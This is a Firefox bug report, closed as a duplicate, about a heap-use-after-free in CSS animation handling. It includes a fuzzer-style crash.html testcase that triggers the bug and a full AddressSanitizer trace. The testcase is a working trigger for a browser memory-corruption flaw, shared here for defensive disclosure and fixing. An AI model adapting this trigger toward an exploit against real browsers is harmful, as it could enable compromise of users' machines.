Closed Bug 1296565 Opened 8 years ago Closed 8 years ago

heap-use-after-free in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint

Categories

(Core :: DOM: Animation, defect)

RESOLVED DUPLICATE of bug 1289701
Tracking Status
firefox51 --- affected

People

(Reporter: nils, Unassigned)

Attached file crash.html
The testcase crashes the latest ASAN build of Firefox as follows.

crash.html:

<script>
function start() {
        o1=document.documentElement;
        o1.setAttribute('hidden','false');
        o1.innerHTML="<svg><font><script>";
        o4=o1.querySelectorAll('*')[1];
        o29=o1.querySelectorAll('*')[4];
        o29.innerHTML="<svg><style>@font-face{ font-family: font7; src: url('x') format('eot')}\n*{ font-size: 85rem!important; all: initial<metadata><foreignObject>";
        o62=o29.querySelectorAll('*')[3];
        while(o1.firstChild)o1.removeChild(o1.firstChild);
        requestAnimationFrame(f1);
}
function f1() {
        o62.innerHTML="<svg><style>@keyframes{}*{ animation-name: key12; animation-duration: 0.001s<style>@keyframes{}\n@keyframes key12{ from{ font: larger Helvetica";
        o1.appendChild(o4);
        location.reload();
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==19899==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500034e208 at pc 0x7f882eb48e25 bp 0x7ffe17a73310 sp 0x7ffe17a73308
READ of size 4 at 0x61500034e208 thread T0 (Web Content)
    #0 0x7f882eb48e24 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1504:54
    #1 0x7f882eb32385 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:599:3
    #2 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #3 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #4 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #5 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #6 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #7 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #8 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #9 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #10 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #11 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #12 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #13 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #14 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #15 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #16 0x7f883320d1e4 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3393:7
    #17 0x7f88331f226c in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3803:3
    #18 0x7f88331f0f91 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:746:3
    #19 0x7f8833215cc6 in BeginProcessingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:853:5
    #20 0x7f8833215cc6 in mozilla::RestyleTracker::DoProcessRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleTracker.cpp:153
    #21 0x7f88331f91b3 in ProcessRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:483:7
    #22 0x7f88331f91b3 in mozilla::RestyleManager::ProcessPendingRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:816
    #23 0x7f883342c9ed in ProcessPendingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #24 0x7f883342c9ed in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:4123
    #25 0x7f883315148b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1737:11
    #26 0x7f883315ce4c in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:247:7
    #27 0x7f883315cb19 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:266:5
    #28 0x7f883315e594 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:426:9
    #29 0x7f8833aaac74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #30 0x7f882d615454 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20
    #31 0x7f882d0ca39f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2048:16
    #32 0x7f882cff9897 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1662:14
    #33 0x7f882cff66d6 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1600:17
    #34 0x7f882cfe44a7 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1567:5
    #35 0x7f882d013dc2 in applyImpl<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #36 0x7f882d013dc2 in apply<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #37 0x7f882d013dc2 in mozilla::detail::RunnableMethodImpl<bool (mozilla::ipc::MessageChannel::*)(), false, true>::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #38 0x7f882d0133af in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:546:22
    #39 0x7f882d0133af in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:565
    #40 0x7f882c264426 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1058:7
    #41 0x7f882c2e23bc in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #42 0x7f882d000bf4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:124:5
    #43 0x7f882cf75b08 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #44 0x7f882cf75b08 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #45 0x7f882cf75b08 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #46 0x7f8832ac35af in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #47 0x7f8834b7a677 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:846:12
    #48 0x7f882cf75b08 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #49 0x7f882cf75b08 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #50 0x7f882cf75b08 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #51 0x7f8834b79d13 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:676:7
    #52 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #53 0x4dfb2b in main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #54 0x7f884771a82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #55 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)

0x61500034e208 is located 8 bytes inside of 512-byte region [0x61500034e200,0x61500034e400)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f882c09cf71 in Free /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:170:34
    #2 0x7f882c09cf71 in nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::ShrinkCapacity(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:230
    #3 0x7f882eb32232 in Clear /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1591:18
    #4 0x7f882eb32232 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:903
    #5 0x7f882eb32232 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:2100
    #6 0x7f882eb32232 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:590
    #7 0x7f882eb43abe in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(nsTArray<mozilla::Keyframe>&&, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:489:5
    #8 0x7f8832ec3236 in UpdateOldAnimationPropertiesWithNew /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:343:5
    #9 0x7f8832ec3236 in CSSAnimationBuilder::Build(nsPresContext*, mozilla::StyleAnimation const&, nsCSSKeyframesRule const*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:627
    #10 0x7f8832ec1e16 in nsAnimationManager::BuildAnimations(nsStyleContext*, mozilla::dom::Element*, mozilla::AnimationCollection<mozilla::dom::CSSAnimation>*, nsTArray<RefPtr<mozilla::dom::CSSAnimation> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:1090:33
    #11 0x7f8832ec13a1 in nsAnimationManager::UpdateAnimations(nsStyleContext*, mozilla::dom::Element*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsAnimationManager.cpp:405:5
    #12 0x7f88330d7dc8 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:950:7
    #13 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #14 0x7f88330dc0e9 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1326:10
    #15 0x7f883303878b in ResolveStyleFor /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85:3
    #16 0x7f883303878b in CalcLengthWith(nsCSSValue const&, int, nsStyleFont const*, nsStyleContext*, nsPresContext*, bool, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:533
    #17 0x7f883313aad1 in SetFontSizeCalcOps::ComputeLeafValue(nsCSSValue const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3240:14
    #18 0x7f883309a316 in nsRuleNode::SetFontSize(nsPresContext*, nsRuleData const*, nsStyleFont const*, nsStyleFont const*, int*, nsFont const&, int, int, bool, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3334:14
    #19 0x7f883309f9a1 in nsRuleNode::SetFont(nsPresContext*, nsStyleContext*, unsigned char, nsRuleData const*, nsStyleFont const*, nsStyleFont*, bool, mozilla::RuleNodeCacheConditions&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:3920:3
    #20 0x7f8833043c46 in nsRuleNode::ComputeFontData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:4179:5
    #21 0x7f883303ddc1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsRuleNode.cpp:2516:10
    #22 0x7f883303e831 in nsStyleContext::StyleData(nsStyleStructID) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleContext.cpp:455:15
    #23 0x7f882eb4f563 in mozilla::dom::CreateStyleContextForAnimationValue(nsCSSProperty, mozilla::StyleAnimationValue, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1486:3
    #24 0x7f882eb48a0b in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1500:9
    #25 0x7f882eb32385 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:599:3
    #26 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #27 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #28 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #29 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #30 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #31 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #32 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #33 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #34 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #35 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #36 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5

previously allocated by thread T0 (Web Content) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0d7d in moz_xrealloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7f882c09d571 in Realloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:182:12
    #3 0x7f882c09d571 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayInfallibleAllocator>(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7f882eb47966 in AppendElements<nsTArrayInfallibleAllocator> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1544:34
    #5 0x7f882eb47966 in AppendElement<nsTArrayInfallibleAllocator> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1572
    #6 0x7f882eb47966 in BuildSegmentsFromValueEntries /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeUtils.cpp:1200
    #7 0x7f882eb47966 in mozilla::KeyframeUtils::GetAnimationPropertiesFromKeyframes(nsTArray<mozilla::Keyframe> const&, nsTArray<nsTArray<mozilla::PropertyStyleAnimationValuePair> > const&, nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeUtils.cpp:670
    #8 0x7f882eb31c9a in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:560:7
    #9 0x7f882eb316db in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/EffectCompositor.cpp:255:5
    #10 0x7f88330d7e46 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:952:7
    #11 0x7f88330dc8b3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/style/nsStyleSet.cpp:1368:10
    #12 0x7f883320eafe in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3483:9
    #13 0x7f8833208bb8 in DoRestyleUndisplayedDescendants /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3428:3
    #14 0x7f8833208bb8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3414
    #15 0x7f88332079eb in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3221:3
    #16 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #17 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #18 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #19 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #20 0x7f883320a7ac in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3729:13
    #21 0x7f8833207abd in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3251:7
    #22 0x7f8833200a8e in mozilla::ElementRestyler::Restyle(nsRestyleHint) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:2296:5
    #23 0x7f883320d1e4 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3393:7
    #24 0x7f88331f226c in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:3803:3
    #25 0x7f88331f0f91 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:746:3
    #26 0x7f8833215cc6 in BeginProcessingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:853:5
    #27 0x7f8833215cc6 in mozilla::RestyleTracker::DoProcessRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleTracker.cpp:153
    #28 0x7f88331f91b3 in ProcessRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:483:7
    #29 0x7f88331f91b3 in mozilla::RestyleManager::ProcessPendingRestyles() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/RestyleManager.cpp:816
    #30 0x7f883342c9ed in ProcessPendingRestyles /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #31 0x7f883342c9ed in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:4123
    #32 0x7f883315148b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1737:11
    #33 0x7f883315ce4c in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:247:7
    #34 0x7f883315cb19 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:266:5
    #35 0x7f883315e594 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:426:9
    #36 0x7f8833aaac74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #37 0x7f882d615454 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/animation/KeyframeEffect.cpp:1504:54 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*)
Shadow bytes around the buggy address:
  0x0c2a80061bf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a80061c40: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80061c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a80061c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
